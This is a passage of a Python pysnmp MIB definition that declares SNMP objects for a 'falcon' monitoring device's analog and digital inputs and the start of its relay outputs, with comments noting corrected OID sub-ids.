falconInput6Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Delay.setStatus('mandatory')
falconInput6Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Hysteresis.setStatus('mandatory')
# --- falconInput7 (universal input, subtree ...3184.1.1.1.3.7) -------------
# Same object layout as falconInput6: state, reading, gain/offset
# calibration, label/UOM strings, two-stage limits, relay control,
# delay and hysteresis.
falconInput7 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7))
# Input mode: not installed / 4-20mA analog / digital NO / digital NC.
falconInput7State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7State.setStatus('mandatory')
# Current measured value (read-only).
falconInput7Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput7Reading.setStatus('mandatory')
falconInput7Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Gain.setStatus('mandatory')
falconInput7Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Offset.setStatus('mandatory')
falconInput7Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Label.setStatus('mandatory')
falconInput7UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7UOM.setStatus('mandatory')
falconInput7HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7HighLimit2.setStatus('mandatory')
falconInput7HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7HighLimit.setStatus('mandatory')
falconInput7LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7LowLimit.setStatus('mandatory')
falconInput7LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7LowLimit2.setStatus('mandatory')
falconInput7RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7RlyControl.setStatus('mandatory')
falconInput7Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Delay.setStatus('mandatory')
falconInput7Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Hysteresis.setStatus('mandatory')
# --- falconInput8 (universal input, subtree ...3184.1.1.1.3.8) -------------
# Same object layout as falconInput6/falconInput7.
#
# FIX: the original registered falconInput8RlyControl at sub-id 9 and
# falconInput8Delay at sub-id 10, colliding with falconInput8LowLimit
# (sub-id 9) and falconInput8LowLimit2 (sub-id 10) above — two MIB
# objects must never share one OID. Re-registered at sub-ids 11/12/13
# to match the layout used by every other analog input group
# (RlyControl=11, Delay=12, Hysteresis=13).
falconInput8 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8))
# Input mode: not installed / 4-20mA analog / digital NO / digital NC.
falconInput8State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8State.setStatus('mandatory')
# Current measured value (read-only).
falconInput8Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput8Reading.setStatus('mandatory')
falconInput8Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Gain.setStatus('mandatory')
falconInput8Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Offset.setStatus('mandatory')
falconInput8Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Label.setStatus('mandatory')
falconInput8UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8UOM.setStatus('mandatory')
falconInput8HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit2.setStatus('mandatory')
falconInput8HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit.setStatus('mandatory')
falconInput8LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit.setStatus('mandatory')
falconInput8LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit2.setStatus('mandatory')
# Sub-id corrected 9 -> 11 (was colliding with falconInput8LowLimit).
falconInput8RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8RlyControl.setStatus('mandatory')
# Sub-id corrected 10 -> 12 (was colliding with falconInput8LowLimit2).
falconInput8Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Delay.setStatus('mandatory')
# Sub-id corrected 11 -> 13 to keep the group layout consistent.
falconInput8Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Hysteresis.setStatus('mandatory')
# --- falconInput9..falconInput14 (digital-only inputs) ---------------------
# These inputs are digital only (no analog mode, no gain/offset/limits):
# state, 0/1 reading, label, relay-control mask and 0-600 delay.
# Note their OID subtrees are ...3.25 through ...3.30, not ...3.9-...3.14.
falconInput9 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25))
falconInput9State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9State.setStatus('mandatory')
falconInput9Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput9Reading.setStatus('mandatory')
falconInput9Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9Label.setStatus('mandatory')
falconInput9RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9RlyControl.setStatus('mandatory')
falconInput9Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9Delay.setStatus('mandatory')
# falconInput10, subtree ...3.26.
falconInput10 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26))
falconInput10State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10State.setStatus('mandatory')
falconInput10Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput10Reading.setStatus('mandatory')
falconInput10Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10Label.setStatus('mandatory')
falconInput10RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10RlyControl.setStatus('mandatory')
falconInput10Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10Delay.setStatus('mandatory')
# falconInput11, subtree ...3.27.
falconInput11 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27))
falconInput11State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11State.setStatus('mandatory')
falconInput11Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput11Reading.setStatus('mandatory')
falconInput11Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Label.setStatus('mandatory')
falconInput11RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11RlyControl.setStatus('mandatory')
falconInput11Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Delay.setStatus('mandatory')
# falconInput12, subtree ...3.28.
falconInput12 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28))
falconInput12State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12State.setStatus('mandatory')
falconInput12Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput12Reading.setStatus('mandatory')
falconInput12Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Label.setStatus('mandatory')
falconInput12RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12RlyControl.setStatus('mandatory')
falconInput12Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Delay.setStatus('mandatory')
# falconInput13, subtree ...3.29.
falconInput13 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29))
falconInput13State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13State.setStatus('mandatory')
falconInput13Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput13Reading.setStatus('mandatory')
falconInput13Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Label.setStatus('mandatory')
falconInput13RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13RlyControl.setStatus('mandatory')
falconInput13Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Delay.setStatus('mandatory')
# falconInput14, subtree ...3.30.
falconInput14 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30))
falconInput14State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14State.setStatus('mandatory')
falconInput14Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput14Reading.setStatus('mandatory')
falconInput14Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Label.setStatus('mandatory')
falconInput14RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14RlyControl.setStatus('mandatory')
falconInput14Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Delay.setStatus('mandatory')
# --- falconInput15 (digital-only input, subtree ...3.31) -------------------
# Same layout as falconInput9-14: state, 0/1 reading, label, relay
# control and delay.
falconInput15 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31))
falconInput15State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15State.setStatus('mandatory')
falconInput15Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput15Reading.setStatus('mandatory')
falconInput15Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Label.setStatus('mandatory')
falconInput15RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15RlyControl.setStatus('mandatory')
# FIX: Delay sub-id corrected 50 -> 5; every other falconInputNDelay in
# this MIB is registered at sub-id 5, so 50 was a transcription typo.
falconInput15Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Delay.setStatus('mandatory')
# --- falconInput16..falconInput20 (digital-only inputs, ...3.32-...3.36) ---
# Same layout as falconInput9-15.
falconInput16 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32))
falconInput16State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16State.setStatus('mandatory')
falconInput16Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput16Reading.setStatus('mandatory')
falconInput16Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Label.setStatus('mandatory')
falconInput16RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16RlyControl.setStatus('mandatory')
falconInput16Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Delay.setStatus('mandatory')
# falconInput17, subtree ...3.33.
falconInput17 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33))
falconInput17State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17State.setStatus('mandatory')
falconInput17Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput17Reading.setStatus('mandatory')
falconInput17Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Label.setStatus('mandatory')
falconInput17RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17RlyControl.setStatus('mandatory')
falconInput17Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Delay.setStatus('mandatory')
# falconInput18, subtree ...3.34.
falconInput18 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34))
falconInput18State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18State.setStatus('mandatory')
falconInput18Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput18Reading.setStatus('mandatory')
falconInput18Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Label.setStatus('mandatory')
falconInput18RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18RlyControl.setStatus('mandatory')
falconInput18Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Delay.setStatus('mandatory')
# falconInput19, subtree ...3.35.
falconInput19 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35))
falconInput19State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19State.setStatus('mandatory')
falconInput19Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput19Reading.setStatus('mandatory')
falconInput19Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Label.setStatus('mandatory')
falconInput19RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19RlyControl.setStatus('mandatory')
falconInput19Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Delay.setStatus('mandatory')
# falconInput20, subtree ...3.36.
falconInput20 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36))
falconInput20State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20State.setStatus('mandatory')
falconInput20Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput20Reading.setStatus('mandatory')
falconInput20Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Label.setStatus('mandatory')
falconInput20RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20RlyControl.setStatus('mandatory')
falconInput20Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Delay.setStatus('mandatory')
# --- falconOutputs / falconRelay1 (subtree ...3184.1.1.1.4) ----------------
# Each relay group exposes: State (configured mode, read-write), Status
# (observed condition, read-only), a display Label and a Time value
# (semantics not visible here — presumably an on-time; confirm against
# vendor MIB).
falconOutputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4))
falconRelay1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1))
falconRelay1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1State.setStatus('mandatory')
